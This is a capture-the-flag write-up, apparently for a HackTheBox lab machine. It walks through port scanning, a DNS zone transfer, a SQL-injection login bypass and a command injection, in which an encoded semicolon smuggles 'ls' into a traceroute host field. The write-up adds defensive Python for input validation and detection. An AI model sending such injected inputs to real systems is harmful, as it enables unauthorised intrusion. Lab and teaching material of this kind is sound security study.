h3xu

# Enumeration
The enumeration results show 3 open ports:

```text
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

So, we are dealing with an Ubuntu machine that is hosting a web application. Port 53 is also open, with an ISC BIND service running on it. Let's research it a little bit more.

[ISC Bind 9](https://www.isc.org/bind/) has evolved to be a very flexible, full-featured DNS system. Whatever your application is, BIND 9 probably has the required features. As the first, oldest, and most commonly deployed solution, there are more network engineers who are already familiar with BIND 9 than with any other system.
 

I was having problems connecting to the web service, so I added the IP to the /etc/hosts file. ![[Pasted image 20210413095138.png]]

# DNS Enumeration

Check out the video from HackerSploit and learn about DNS enumeration and zone transfers to understand the following lines.
 

```text
$ dig axfr @10.10.10.13 cronos.htb

; <<>> DiG 9.16.2-Debian <<>> axfr @10.10.10.13 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800    IN    NS    ns1.cronos.htb.
cronos.htb.        604800    IN    A    10.10.10.13
admin.cronos.htb.    604800    IN    A    10.10.10.13
ns1.cronos.htb.        604800    IN    A    10.10.10.13
www.cronos.htb.        604800    IN    A    10.10.10.13
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
;; SERVER: 10.10.10.13#53(10.10.10.13)
;; WHEN: Tue Apr 13 07:09:07 UTC 2021
;; XFR size: 7 records (messages 1, bytes 203)
```

I have found a couple of domains linked to cronos. Let's add them to the /etc/hosts file too, in order to access them in the browser.
![[Pasted image 20210413101836.png]]
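To turn the transfer above into /etc/hosts entries without retyping them, here is an added Python example (not part of the original post) that parses dig's AXFR output. It also checks that the transfer is complete, which is what the repeated SOA record at the end signals; the sample input is a constructed copy of the output shown above.

```python
import re

# Constructed copy of the dig AXFR output shown above.
DIG_AXFR_OUTPUT = """\
;; global options: +cmd
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.        604800    IN    NS    ns1.cronos.htb.
cronos.htb.        604800    IN    A    10.10.10.13
admin.cronos.htb.    604800    IN    A    10.10.10.13
ns1.cronos.htb.        604800    IN    A    10.10.10.13
www.cronos.htb.        604800    IN    A    10.10.10.13
cronos.htb.        604800    IN    SOA    cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 28 msec
"""

# One zone record as dig prints it: owner TTL class type rdata
RECORD_RE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.+)$")


def parse_axfr(text):
    """Return (owner, type, rdata) tuples, skipping dig's ';' comment lines."""
    records = []
    for line in text.splitlines():
        if not line or line.startswith(";"):
            continue
        m = RECORD_RE.match(line)
        if m:
            owner, _ttl, rtype, rdata = m.groups()
            records.append((owner.rstrip("."), rtype, rdata.strip()))
    return records


def transfer_complete(records):
    """A well-formed AXFR starts and ends with the zone's SOA record."""
    return len(records) >= 2 and records[0][1] == "SOA" and records[-1][1] == "SOA"


def hosts_lines(records):
    """One /etc/hosts line per address, listing every name with an A record for it."""
    by_ip = {}
    for owner, rtype, rdata in records:
        if rtype == "A":
            by_ip.setdefault(rdata, set()).add(owner)
    return [f"{ip}\t{' '.join(sorted(names))}" for ip, names in sorted(by_ip.items())]


if __name__ == "__main__":
    recs = parse_axfr(DIG_AXFR_OUTPUT)
    print(transfer_complete(recs), hosts_lines(recs))
```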

# Admin.cronos.htb & SQLi
![[Pasted image 20210413101925.png]]

A quick SQLi check lets us in.
![[Pasted image 20210413102037.png]]

Two tools are running on the welcome.php page: *ping* and *traceroute*. From Burp, I have poked the application and discovered command injection.

### Request
 

```http
POST /welcome.php HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/welcome.php
Cookie: PHPSESSID=huubsof4d0e5ged45ge0gflp26
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

command=traceroute&host=8.8.8.8%3Bls+.
```

I have encoded a semicolon and added the ls command for the current directory.
### Response
 

```http
HTTP/1.1 200 OK
Date: Tue, 13 Apr 2021 08:01:47 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 527
Connection: close
Content-Type: text/html; charset=UTF-8

<html">
   
   <head>
      <title>Net Tool v0.1 </title>
   </head>
   
   <body>
    <h1>Net Tool v0.1</h1>
    <form method="POST" action="">
    <select name="command">
        <option value="traceroute">traceroute</option>
        <option value="ping -c 1">ping</option>
    </select>
    <input type="text" name="host" value="8.8.8.8"/>
    <input type="submit" value="Execute!"/>
    </form>
            config.php<br>
        index.php<br>
        logout.php<br>
        session.php<br>
        welcome.php<br>
              <p><a href = "logout.php">Sign Out</a></p>
   </body>
   
</html>
```
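The directory listing in the response shows that the form fields reach a shell as one string, so the `;` ends the traceroute and starts a second command. As an added example (not the Net Tool's own code, whose PHP is not on the page), the Python below shows the fix a defender would want: the command must be one of the two form options, the host must parse as an IP address or an RFC 1123 hostname, and the result is an argv list for `subprocess.run` with no shell; it also reports which shell metacharacters were seen, which is what a WAF rule or log alert would key on. The request body is a constructed copy of the Burp capture above.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Constructed copy of the request body from the Burp capture above.
INJECTED_BODY = "command=traceroute&host=8.8.8.8%3Bls+."

# The two option values the form offers, mapped to argv prefixes (no shell involved).
ALLOWED_COMMANDS = {
    "traceroute": ["traceroute"],
    "ping -c 1": ["ping", "-c", "1"],
}
# RFC 1123 hostname: dot-separated labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
SHELL_METACHARS = set(";|&$`<>(){}\n\\'\"")


def shell_metachars(value):
    """Detection view: which shell metacharacters appear in a submitted parameter."""
    return sorted(set(value) & SHELL_METACHARS)


def valid_target(host):
    """Accept only an IP literal or an RFC 1123 hostname; reject anything else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME_RE.match(host))


def build_argv(body):
    """Turn a welcome.php POST body into an argv list for subprocess.run(argv)
    (list form, shell=False). Raises ValueError on anything outside the allowlists."""
    form = parse_qs(body, keep_blank_values=True)
    command = form.get("command", [""])[0]
    host = form.get("host", [""])[0]
    if command not in ALLOWED_COMMANDS:
        raise ValueError(f"command not in allowlist: {command!r}")
    if not valid_target(host):
        raise ValueError(f"host is not an IP or hostname: {host!r} "
                         f"(shell metacharacters: {shell_metachars(host)})")
    return ALLOWED_COMMANDS[command] + [host]
```

Calling `build_argv(INJECTED_BODY)` raises ValueError naming the `;`, while `build_argv("command=traceroute&host=8.8.8.8")` returns `["traceroute", "8.8.8.8"]`.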

 
